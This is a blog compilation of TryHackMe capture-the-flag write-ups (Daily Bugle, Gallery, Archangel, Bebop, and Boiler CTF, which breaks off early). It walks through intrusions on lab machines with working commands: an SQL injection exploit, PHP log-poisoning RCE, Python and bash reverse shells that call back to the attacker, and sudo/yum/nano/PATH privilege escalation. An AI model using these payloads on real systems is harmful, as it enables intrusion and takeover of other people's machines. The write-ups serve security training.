0xm3dd

TryHackMe: Daily Bugle Writeup

Sun, 22 Feb 2026 00:00:00 GMT

Introduction

Daily Bugle is a Hard difficulty room on TryHackMe that focuses on web exploitation and Linux privilege escalation. The path involves enumerating a Joomla CMS, exploiting a known SQL injection vulnerability to steal password hashes, cracking those hashes for initial access, and finally exploiting a misconfigured yum binary to obtain root.

Room Link: Daily Bugle

1. Reconnaissance

Nmap Scan

I started the engagement by running a comprehensive Nmap scan to identify open ports and services running on the target machine.

nmap -A -T4 -p- 10.82.177.219 -oA scan -Pn

Scan Results:

Starting Nmap 7.98 ( [https://nmap.org](https://nmap.org) ) at 2026-02-22 12:42 +0000
Nmap scan report for 10.82.177.219
Host is up (0.067s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-generator: Joomla! - Open Source Content Management
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)

22/tcp: SSH (OpenSSH 7.4)
80/tcp: HTTP (Apache 2.4.6 / PHP 5.6.40)
3306/tcp: MySQL (MariaDB)

:::note The Nmap output (robots.txt and http-generator) strongly indicates the web server is running the Joomla! Content Management System. :::

2. Web Enumeration

Exploring the Homepage

Navigating to the web server on port 80, I was greeted by the Daily Bugle homepage. The main article prominently features a security camera image and a headline answering our first objective.

Answer 1

Access the web server, who robbed the bank?

Spiderman

Directory Enumeration

Investigating the robots.txt file revealed a standard Joomla directory structure, including the /administrator/ backend login panel.

Without valid credentials, I needed to determine the exact version of the CMS to hunt for public exploits. The version wasn't readily apparent in the page source code.

Version Discovery

After some research on Joomla enumeration (https://hackertarget.com/attacking-enumerating-joomla/#joomla-core-version), I learned that the core version is often exposed in an XML manifest file. I navigated to the following endpoint:

/administrator/manifests/files/joomla.xml

Reading the XML file, I successfully identified the Joomla version.

:::tip When attacking Joomla, if automated tools like joomscan fail or you want to enumerate manually, /administrator/manifests/files/joomla.xml or /language/en-GB/en-GB.xml are the best places to find the exact version number. :::

Answer 2

What is the Joomla version?

3.7.0

3. Initial Exploitation (SQL Injection)

Finding the Exploit

Knowing the target is running Joomla 3.7.0, I searched for known vulnerabilities. This specific version is notoriously vulnerable to CVE-2017-8917, an unauthenticated SQL Injection in the com_fields component.

Following the room's hint to use a Python script instead of sqlmap, I located a public exploit on GitHub called Joomblah (https://github.com/teranpeterson/Joomblah).

:::note CVE-2017-8917: This vulnerability allows an attacker to inject SQL commands into the backend database without needing to authenticate, often leading to the extraction of sensitive data like session tokens or administrator password hashes. :::

Running Joomblah

I downloaded the joomblah.py script and executed it against the target URL.

# Downloading the exploit
wget https://raw.githubusercontent.com/teranpeterson/Joomblah/master/joomblah.py

# Running the exploit
python3 joomblah.py http://10.82.177.219

Extracting and Cracking the Hash

Running the joomblah.py script successfully exploited the vulnerability and dumped the database contents, revealing the credentials for the Super User account.

Username: jonah
Hash: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

:::note The $2y$ prefix signifies that this is a bcrypt hash. Bcrypt is intentionally designed to be slow and computationally expensive to resist brute-force attacks, so cracking it might take a minute or two. :::

Given the hardware-intensive nature of cracking bcrypt locally, I opted to check public cracked hash databases first to save CPU resources. I submitted the hash to hashes.com, which had it in its database and instantly returned the plaintext password.

Answer 3

What is Jonah's cracked password?

spiderman123

After using the credentials found , I have successfully logged in.

4. Initial Access (Reverse Shell)

Exploiting Joomla Templates

With administrative access to the Joomla backend, my next objective was to establish a reverse shell on the underlying system. Joomla allows administrators to modify the source code of the site's frontend templates directly from the browser.

I navigated to Extensions > Templates > Templates and selected the default beez3 template. I chose to edit the error.php file, replacing its legitimate PHP code with a standard PHP reverse shell payload, configured with my VPN IP and listening port (9001).

:::tip Joomla stores its frontend templates in the /templates/ directory at the web root. By knowing the template name (beez3) and the edited file (error.php), the malicious code can be executed simply by browsing to that specific URL. :::

Triggering the Payload

After saving the modified template file, I set up a Netcat listener on my attack machine.

ncat -lnvp 9001

I then triggered the payload by navigating to the file's location in the browser: http://10.82.177.219/templates/beez3/error.php

Result --> The web server executed the PHP code, and I successfully caught a reverse shell connection.

Shell Stabilization

Upon receiving the connection, the shell was limited (non-interactive). I stabilized it using Python to spawn a fully interactive TTY.


python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# (Ctrl+Z to background)
stty raw -echo; fg

5. Lateral Movement (jjameson)

Enumerating Local Users

While exploring the file system as the apache user, I checked the /home/ directory to identify potential targets for privilege escalation. I discovered a user directory for jjameson. However, my current privileges did not allow me to read the contents of their home folder.

To find a way to pivot to this user, I navigated to the web application's root directory (/var/www/html/) to look for sensitive files.

:::tip In CMS environments like Joomla or WordPress, core configuration files (configuration.php or wp-config.php) are prime targets because they invariably contain plaintext backend database credentials. :::

Reading the configuration.php file revealed the database user (root) and its password.

cat /var/www/html/configuration.php | grep password
# Output: public $password = 'nv5uz9r3ZEDzVjNu';

Password Reuse

I initially used these credentials to log into the MySQL database, but further enumeration there didn't yield any immediate escalation paths. Suspecting a classic case of password reuse, I tried switching to the jjameson user account using the discovered database password.

su jjameson
# Password: nv5uz9r3ZEDzVjNu

Success! The password was valid, and I successfully moved laterally to the jjameson account.

Retrieving the User Flag Now authenticated as jjameson, I navigated to the user's home directory and successfully retrieved the user flag.

Answer 4

What is the user flag?

27a260[REDACTED]80442e

6. Privilege Escalation (Root)

Enumerating Sudo Privileges: After gaining access as the jjameson user, my first step to escalate privileges was to check what commands the user is permitted to run as root using sudo.

sudo -l

The output revealed that jjameson can execute the yum package manager as root.

Exploiting Yum via Custom Plugins (GTFOBins) I referenced GTFOBins for /usr/bin/yum and found that yum allows the loading of custom Python plugins. By creating a malicious plugin and executing yum with sudo, we can force the application to execute arbitrary Python code as the root user.

I executed the following block of commands to set up the malicious plugin and trigger the exploit:


# 1. Create a temporary directory
TF=$(mktemp -d)

# 2. Create a custom yum configuration file pointing to the temp directory
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

# 3. Create the plugin configuration file to enable it
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

# 4. Create the malicious Python plugin that spawns a bash shell
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/bash','/bin/bash')
EOF

# 5. Execute yum with sudo, loading the malicious configuration and plugin
sudo yum -c $TF/x --enableplugin=y

The malicious plugin was loaded and executed by yum running as root, immediately dropping me into a root shell.

Retrieving the Root Flag

With full administrative control over the machine, I navigated to the root directory and retrieved the final flag.

Answer 5

What is the root flag?

eec3d53[REDACTED]fa6f79

Happy Hacking fellas :)

TryHackMe: Gallery Writeup

Mon, 16 Feb 2026 00:00:00 GMT

Room Link:https://tryhackme.com/room/gallery666

Introduction

Gallery is a vulnerable Linux machine featuring a custom-built Image Gallery CMS. The investigation focuses on identifying weaknesses in the web application layer, performing credential recovery, and exploiting system-level misconfigurations to achieve full administrative control.

Objectives

Reconnaissance: Identify open services and software versions.
Initial Access: Exploit the CMS to obtain a low-privileged shell.
Privilege Escalation: Elevate permissions from a standard user to root.

Task 1: Deploy and get a Shell

1. Enumeration

I performed a full TCP port scan using Nmap to identify open services.

nmap -A -T4 -p- 10.67.152.216 -oN nmap-scan

Nmap Results:

22/tcp: SSH (OpenSSH 8.2p1)
80/tcp: HTTP (Apache default page)
8080/tcp: HTTP (Simple Image Gallery System)

Answer 1

How many ports are open?

3

After Inspecting the webpage at port 8080 we can clearly see the name of the CMS running on that port.

Answer 2

What's the name of the CMS?

Simple Image Gallery

2. Web Exploitation

Authentication Bypass

I navigated to the login page at http://10.67.152.216:8080/gallery/login.php. Suspecting a lack of input sanitization, I attempted a standard SQL injection payload in the Username field to bypass authentication.

Payload: admin' OR 1=1 -- -
Password: password (Any value works)

The application accepted the payload, treating the condition 1=1 as true, and logged me in as the administrator.

Database Enumeration (SQL Injection)

Once inside the dashboard, I confirmed the CMS version is 1.0. I searched for known vulnerabilities using searchsploit.

I identified an SQL Injection vulnerability in the id parameter (reading 50198.txt exploit file).

Exploitation (Burp Suite)

To replicate the exploit's Proof of Concept (PoC) exactly, I captured the specific HTTP request triggering the vulnerability.

Intercepting the Request:

I configured my browser to proxy traffic through Burp Suite and clicked on an image within an album. I captured the GET request containing the vulnerable id parameter and saved it to a file named test.req.

Enumerating Databases:

I passed the captured request file to sqlmap to identify the backend databases.

sqlmap -r test.req --dbs

sqlmap identified the backend DBMS as MySQL and listed the available databases.

Retrieving Admin Credentials

With the database name identified as gallery_db, I targeted the users table to dump the administrator's credentials.

sqlmap -r test.req -D gallery_db -T users --dump --batch

The tool successfully dumped the users table, revealing the administrator's username and password hash.

Answer 3

What's the hash password of the admin user?

a228b12a[REDACTED]be5d914531c

3. Remote Code Execution (RCE)

File Upload Vulnerability

With administrative access confirmed, I navigated to the "Albums" dashboard. I created a new album and discovered that the image upload feature lacks proper file type validation, allowing for the upload of PHP scripts.

Exploitation Steps:

Payload Preparation: I prepared a standard PHP reverse shell (PentestMonkey), modifying the $ip to my VPN address and the $port to 1337. You can use your preffered port :)
Upload: Inside the new album, I uploaded the malicious php_reverse_shell.php file.

Listener Setup: I started a Netcat listener on port 1337 to catch the connection.

nc -lnvp 1337

Execution: I clicked on the uploaded file icon in the dashboard to execute the script on the server.

Initial Access:

I successfully established a reverse shell connection as the www-data user.

Shell Stabilization

Upon receiving the connection, the shell was limited (non-interactive). I stabilized it using Python to spawn a fully interactive TTY.

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# (Ctrl+Z to background)
stty raw -echo; fg

4. Lateral Movement (Mike)

After gaining initial access as www-data, I spent a significant amount of time manually exploring the file system. I checked standard locations like /home, /var/www, and /opt but hit several dead ends. The room hint "Mike's mistake" suggested a human error, so I expanded my search to look for backup files or hidden history.

:::tip

In a real engagement, running an automated enumeration script like LinPEAS (./linpeas.sh) is highly recommended at this stage. It would likely have flagged the /var/backups directory or the readable .bash_history file immediately, saving time on manual searching.

:::

Discovery: The Backup Directory

My persistence paid off when I investigated the /var/backups/ directory. I discovered a non-standard folder named mike_home_backup.

ls -al /var/backups/

Inside this directory, I found a .bash_history file that was readable by my current user (www-data).

The history revealed the critical mistake: the user accidentally typed their password directly into the command line while trying to run sudo -l.

Credential Found: b3stpassw0rdbr0xx

Switching Users

I used this leaked password to switch to the mike user.

Now authenticated as Mike, I retrieved the user flag.

Answer 4

What's the user flag?

THM{REDACTED}

Task 2: Escalate to the root user

1. Privilege Escalation Enumeration

After gaining access as mike, I checked for sudo privileges to identify potential escalation vectors.

The output confirmed that mike can run a custom script as root without a password.

I inspected the content of this script to understand its functionality.

cat /opt/rootkit.sh

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;


# Execute your choice

case $ans in

    versioncheck)

        /usr/bin/rkhunter --versioncheck ;;

    update)

        /usr/bin/rkhunter --update;;

    list)

        /usr/bin/rkhunter --list;;

    read)

        /bin/nano /root/report.txt;;

    *)
esac

The script presents a menu to the user. The read option executes /bin/nano on /root/report.txt with root privileges. Since nano allows for command execution, this can be exploited to spawn a root shell (a known GTFOBins technique).

2. The Path to Root (GTFOBins: Nano)

I executed the script with sudo and selected the read option to launch nano as root.

sudo /bin/bash /opt/rootkit.sh
# Input: read

Inside the editor, I used the following key sequence to escape the restricted environment and spawn a shell:

Press Ctrl + R (Read File).
Press Ctrl + X (Execute Command).
Type the command: reset; sh 1>&0 2>&0
Press Enter.

This spawned a shell with root privileges.

3. Retrieving Root Flag

Successfully escalated to root, I navigated to the root directory and captured the final flag.

cat /root/root.txt

#THM{REDACTED}

Answer 5

What's the root flag?

THM{REDACTED}

Conclusion

This room demonstrated a classic web-to-root attack chain. I leveraged SQL Injection to extract credentials and File Upload RCE to gain initial access. Finally, I escalated privileges by uncovering a password leak in .bash_history and exploiting a misconfigured Sudo permission on nano to gain root.

Thanks for following the journey to Root :)

TryHackMe: Archangel Writeup

Sat, 14 Feb 2026 00:00:00 GMT

Room Link:https://tryhackme.com/room/archangel

Introduction

Welcome to another write-up. Today we are tackling the Archangel room on TryHackMe. This is a boot-to-root challenge that will test our web enumeration and privilege escalation skills on a Linux environment. Let's dive in.

Task 1: Deploy machine

1. Deploy the machine.

Done.

Task 2: Get a shell

1. Enumeration

Nmap Scan

I started by scanning the target to identify open ports and services.

nmap -A -p- -T4 10.65.136.16 -oN nmap-scan

Nmap Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire

Analysis: The scan reveals two open ports: 22 (SSH) and 80 (HTTP). The web server is running Apache on Ubuntu.

Web Enumeration

I visited the website at http://10.65.136.16. The page displayed a generic "WaveFire" company site.

Looking at the page header, I noticed a support email address listed as support@mafialive.thm. This immediately revealed the internal hostname.

Hostname Found: mafialive.thm

Answer 1

Find a different hostname

mafialive.thm

Configuration

To access the virtual host, I added the domain to my /etc/hosts file to map it to the target IP.

echo "10.65.136.16 mafialive.thm" | sudo tee -a /etc/hosts

2. Capturing Flag 1

With the hostname configured, I visited http://mafialive.thm. The site loaded a different page than the IP address, confirming the virtual routing.

I immediately spotted the first flag displayed on the homepage.

Answer 2

Find flag 1

thm{REDACTED}

3. Finding the Development Page

The next objective was to find a "page under development." I decided to use feroxbuster to enumerate directories and files, as it's faster and handles recursion well.

The tool successfully located http://mafialive.thm/test.php

I visited the page and found a title reading "Test Page. Not to be Deployed" and a single button labeled "Here is a button".

Answer 3

Look for a page under development

test.php

4. Vulnerability Discovery (LFI)

Clicking the button didn't trigger any obvious visible change on the page content immediately (other than the text "Control is an illusion"), but I noticed a significant change in the URL bar.

URL Change: http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php

Analysis: The view parameter is taking a full file path (/var/www/html/development_testing/mrrobot.php) as input. This strongly suggests a Local File Inclusion (LFI) vulnerability. If the input isn't properly sanitized, we can manipulate this parameter to read arbitrary files on the system (like /etc/passwd) or source code.

Attempting Directory Traversal: I attempted to read the /etc/passwd file using standard traversal payloads.

http://mafialive.thm/test.php?view=../../../../etc/passwd

The server responded with "Sorry, Thats not allowed". This indicates a filter is in place, likely blocking the ../ sequence to prevent basic traversal.

5. Filter Bypass & Flag 2

Since I knew the absolute path from the previous URL (/var/www/html/development_testing/mrrobot.php), I realized I didn't need to use ../. I could target the known files directly using their full paths.

To read the content of the file (instead of executing it), I used the PHP base64 filter wrapper.

I modified the payload to target test.php instead of the decoy file.

Payload:

view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

And the result is a long base64 string.

CQo8IURPQ1RZUEUgSFRNTD4KPGh0bWw+Cgo8aGVhZD4KICAgIDx0aXRsZT5JTkNMVURFPC90aXRsZT4KICAgIDxoMT5UZXN0IFBhZ2UuIE5vdCB0byBiZSBEZXBsb3llZDwvaDE+CiAKICAgIDwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iL3Rlc3QucGhwP3ZpZXc9L3Zhci93d3cvaHRtbC9kZXZlbG9wbWVudF90ZXN0aW5nL21ycm9ib3QucGhwIj48YnV0dG9uIGlkPSJzZWNyZXQiPkhlcmUgaXMgYSBidXR0b248L2J1dHRvbj48L2E+PGJyPgogICAgICAgIDw/cGhwCgoJICAgIC8vRkxBRzogdGhte2V4cGxvMXQxbmdfbGYxfQoKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICBpZihpc3NldCgkX0dFVFsidmlldyJdKSl7CgkgICAgaWYoIWNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcuLi8uLicpICYmIGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICcvdmFyL3d3dy9odG1sL2RldmVsb3BtZW50X3Rlc3RpbmcnKSkgewogICAgICAgICAgICAJaW5jbHVkZSAkX0dFVFsndmlldyddOwogICAgICAgICAgICB9ZWxzZXsKCgkJZWNobyAnU29ycnksIFRoYXRzIG5vdCBhbGxvd2VkJzsKICAgICAgICAgICAgfQoJfQogICAgICAgID8+CiAgICA8L2Rpdj4KPC9ib2R5PgoKPC9odG1sPgoKCg==

I decoded the resulting Base64 string and successfully retrieved the source code for the vulnerable page.

<!DOCTYPE HTML>
<html>

<head>
    <title>INCLUDE</title>
    <h1>Test Page. Not to be Deployed</h1>

    </button></a> <a href="/test.php?view=/var/www/html/development_testing/mrrobot.php"><button id="secret">Here is a button</button></a><br>
        <?php

            //FLAG: thm{REDACTED}

            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
            if(isset($_GET["view"])){
            if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
                include $_GET['view'];
            }else{

                echo 'Sorry, Thats not allowed';
            }
        }
        ?>
    </div>
</body>                                                                                                                                                                                                                         </html>

Answer 4

Find flag 2

thm{REDACTED}

6. Vulnerability Analysis

Analyzing the source code retrieved above reveals the logic behind the security filter:

function containsStr($str, $substr) {
    return strpos($str, $substr) !== false;
}

if(!containsStr($_GET['view'], '../..') && containsStr($_GET['view'], '/var/www/html/development_testing')) {
    include $_GET['view'];
}

The logic has two conditions:

The Allow List: The path must contain /var/www/html/development_testing.
The Block List: The path must not contain ../...

The Bypass:

We can bypass the directory traversal filter because strpos is looking for the exact string ../... In Linux, ..//..// is functionally equivalent to ../../ but looks different to the string matching function.

7. Apache Log Poisoning (RCE)

The hint "Poison" suggests targeting the Apache Access Logs. If we can inject PHP code into the log (by sending a malicious User-Agent) and then include that log file, the server will execute our code.

You can read this documentation its pretty useful -> https://github.com/VVVI5HNU/LFI-RCE-log-poisoning

Step 1: Verify Access to Logs

First, I verified that I could read the Apache access logs. Since I knew the filter blocked ../.., I used the bypass ..//..// to navigate to the standard Ubuntu log location.

Payload:

http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log

The server returned the content of the log file, confirming that I had read access.

Step 2: Injecting the Payload (Log Poisoning)

To achieve Remote Code Execution (RCE), I decided to poison the log file by injecting a PHP shell. Apache logs the User-Agent header of every request, making it a perfect vehicle for our payload.

I used curl to send a request with a malicious User-Agent containing a PHP system() call.

curl -A "<?php system(\$_GET['cmd']); ?>" http://mafialive.thm/test.php

:::note The \ before $_GET escapes the variable so it is sent literally to the server, rather than being interpreted by my local shell. :::

Step 3: Executing Code

With the payload successfully written to access.log, I triggered it by including the log file again via the LFI vulnerability. This time, I appended the &cmd=id parameter to execute a system command.

URL :

http://mafialive.thm/test.php?view=/var/www/html/development_testing/..//..//..//..//var/log/apache2/access.log&cmd=id

Scanning through the response (in the last line of the output) , I found the output of the id command executed by the server: uid=33(www-data) gid=33(www-data) groups=33(www-data)

RCE Confirmed!

8. Getting a Reverse Shell

Step 1: Setting up the Listener

To upgrade my access from simple command execution to an interactive shell, I started a Netcat listener on my local machine.

nc -lvnp 4444

Step 2: Payload Execution

I utilized a standard Python3 reverse shell one-liner to initiate the callback.

Payload:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("MY_VPN_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I URL-encoded this payload using CyberChef to ensure it would be processed correctly by the browser, then passed it to the cmd parameter.

Step 3: Catching the Shell

The listener caught the connection, granting me a shell as the www-data user.

9. Retrieving User Flag

With shell access, I navigated to the /home directory to identify users.

$ ls /home
archangel

I accessed the user's directory and retrieved the flag.

Answer 5

Get a shell and find the user flag

thm{REDACTED}

False Lead: The "Password Backup"

While enumerating the /home/archangel directory, I found a folder named myfiles containing a file called passwordbackup.

$ cat /home/archangel/myfiles/passwordbackup
https://www.youtube.com/watch?v=dQw4w9WgXcQ

I checked the link, and it turned out to be a Rickroll (Rick Astley - Never Gonna Give You Up). This was a rabbit hole. So we got Rickrolled :))

Enumeration

I checked /opt and found a custom script named helloworld.sh.

Crucially, this file is world-writable (777 permissions).

I then checked /etc/crontab to see if this script was being executed automatically.

Vulnerability Identified: The system runs /opt/helloworld.sh every minute as the user archangel. Since I have write permissions to this file, I can replace its contents with a reverse shell payload to escalate my privileges from www-data to archangel.

Exploiting the Cron Job

Since I had write access to /opt/helloworld.sh, I appended a reverse shell one-liner to the script. This ensures that when the cron job executes the script (every minute), it will also execute my malicious code.

Step 1: Setting up the Listener I started a new Netcat listener on port 5555 to catch the incoming connection.

nc -lvnp 5555

Step 2: Injecting the Payload I used the echo command to append the bash reverse shell to the target script.

echo "bash -i >& /dev/tcp/10.9.1.145/5555 0>&1" >> /opt/helloworld.sh

Step 3: Catching the Shell After waiting for less than a minute, the cron job executed, and I received a callback on my listener.

Retrieving User 2 Flag

With access as archangel, I navigated to the previously restricted secret directory. And I read the flag file found therein.

Answer 6

Get User 2 flag

thm{REDACTED}

4. Root Privilege Escalation (Path Hijacking)

Enumeration

I listed the files in the secret directory and identified a suspicious binary named backup.

archangel@ubuntu:~/secret$ ls -l backup
-rwsr-xr-x 1 root root 16904 Nov 18 2020 backup

The s bit indicates it is a SUID binary owned by root. When I attempted to run it, it produced an error involving the cp command.

cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory

Vulnerability Analysis: The error message reveals that the binary is trying to execute the system command cp. Crucially, because it likely calls cp directly (instead of the absolute path /bin/cp), it is vulnerable to Path Hijacking. The system will look for cp in the directories listed in my PATH variable. If I can place a malicious script named cp in a folder I control and add that folder to the start of my PATH, the binary will execute my script as root instead of the real copy command.

Exploitation

To exploit this, I created a malicious script named cp in the current directory (/home/archangel/secret). This script simply spawns a bash shell.

And I manipulated the PATH environment variable. I added the current directory (.) to the beginning of the path list.

Finally, I executed the SUID binary. The binary searched for cp, found my malicious script first (because my current directory is now first in the list), and executed it with root privileges.

Answer 7

Root the machine and find the root flag

thm{REDACTED}

Conclusion

And that’s a wrap! We successfully compromised the Archangel machine by chaining multiple vulnerabilities:

LFI & Log Poisoning: We turned a simple file inclusion bug into Remote Code Execution.
Horizontal Escalation: We hijacked a cron job to pivot to the archangel user.
Vertical Escalation: We exploited a path hijacking vulnerability in a SUID binary to gain root access.

This room was a great exercise in understanding how simple misconfigurations—like world-writable scripts and relative paths in SUID binaries—can lead to total system compromise.

Thanks for reading! Happy Hacking ツ

TryHackMe: Bebop Writeup

Wed, 11 Feb 2026 00:00:00 GMT

Room Link : https://tryhackme.com/room/bebop

Introduction

Bebop is a quick but fascinating box that demonstrates just how fragile some embedded systems can be. It specifically targets the Parrot Bebop drone, running a customized OS that—spoiler alert—isn't as secure as one might hope for a flying object.

The room is heavily inspired by the iconic DEFCON 23 talk "Knocking my neighbor's kid's cruddy drone offline". The overarching concept of drone hacking is terrifyingly cool, and if you haven't seen the original talk, I highly recommend watching it before diving in. It gives great context to what we are about to do.

Task 1: Takeoff!

1. Deploy the machine.

Done.

2. What is your codename?

pilot

Task 2: Manoeuvre

Reconnaissance

I started by scanning the target as always to identify open ports and running services.

nmap -sV -sC -T4 10.66.170.132 -oN nmap-scan

Nmap Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Analysis: The scan reveals that the drone is running a BSD-based operating system. Interestingly, Port 23 (Telnet) is open. Telnet is an insecure, legacy protocol that transmits data in cleartext. This is highly unusual for a modern device and serves as our primary vector for investigation.

Exploitation

Initial Access via Telnet

Given the open Telnet port and the codename "pilot" obtained in Task 1, I attempted to log in directly. I used the -l flag to specify the user.

telnet -l pilot 10.66.170.132

Output:

Trying 10.66.170.132...
Connected to 10.66.170.132.
Escape character is '^]'.
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!
[pilot@freebsd ~]$

We successfully established a session without needing a password. This confirms the premise that the drone's OS is highly insecure.

Capturing the User Flag

Once inside, I listed the files in the current directory and found user.txt.

I read the file to capture the flag.

Answer 1

What is the User Flag?

THM{REDACTED}

Privilege Escalation

Pretty much the first thing you usually do when aiming for privesc on a Linux computer is look to see what you can run as sudo. Running sudo -l and see if we can run anything as root:

[!NOTE] BusyBox: is software that provides several stripped-down Unix tools in a single executable file. It is often found in embedded devices like drones to save disk space. Since we can run busybox as root, we can execute any of its internal commands (like sh) with root privileges.

Enumerating BusyBox Capabilities

To see exactly which commands (applets) were available inside this BusyBox binary, I ran it without arguments:

sudo busybox

I spotted sh in the list of defined functions. This confirms we can spawn a shell.

Rooting the Drone

I executed the sh command through the sudo-enabled busybox binary. Since busybox runs as root, the shell it spawns inherits those privileges.

Success! I verified access to the root directory and captured the final flag.

# cat /root/root.txt
THM{REDACTED}

Task 3: Quiz!

What is the low privileged user?

pilot

What binary was used to escalate privileges?

busybox

What service was used to gain an initial shell?

telnet

What Operating System does the drone run?

FreeBSD

Conclusion

Bebop demonstrated the fragility of embedded systems. By exploiting an unsecured Telnet service and a misconfigured busybox binary, we went from zero access to root privileges in minutes. This room serves as a stark reminder that even "toy" drones require robust security configurations, as they are effectively flying computers that can be easily compromised if left wide open.

Happy Hacking :)

TryHackMe: Boiler CTF Writeup

Sun, 01 Feb 2026 00:00:00 GMT

Room Link: https://tryhackme.com/room/boilerctf2

Introduction

Welcome to my writeup for Boiler CTF. This is an intermediate-level room that focuses heavily on enumeration. The room description warns us: "Just enumerate, you'll get there." This implies we will face multiple services, potential rabbit holes, and the need to be thorough with our scans.

Our goal is to find the user flags, exploit the machine, and escalate privileges to root.

Initial Enumeration

Port Scanning

I began with a full TCP port scan to identify all running services, specifically looking for high-numbered ports as hinted by the room tasks.

nmap -sV -sC -T4 10.66.153.164 -oN nmap_scan

Scan Output:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.132.71
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.930
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

The scan revealed 4 ports:

1.Port 21 (FTP): Running vsftpd 3.0.3 with Anonymous login enabled.

Port 80 (HTTP): Running Apache.
Port 10000 (HTTP): Running Webmin (MiniServ 1.930).
Port 55007: Running SSH.

Task 1: Enumeration & Questions

FTP Investigation

Since anonymous login was allowed, I connected to the FTP server to see if any sensitive files were exposed.

ftp -a 10.66.153.164

Session Log:

Connected to 10.66.153.164.
220 (vsFTPd 3.0.3)
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alps
229 Entering Extended Passive Mode (|||43621|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 .
drwxr-xr-x    2 ftp      ftp          4096 Aug 22  2019 ..
-rw-r--r--    1 ftp      ftp            74 Aug 21  2019 .info.txt
226 Directory send OK.

I found a hidden file named .info.txt and we found our first answer.

[!NOTE] Use get .info.txt to download this file on your machine.

Answer1

File extension after anon login

txt

Analyzing the Hidden File

After downloading the file on my machine I inspected its content.

cat .info.txt
# Output: Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!

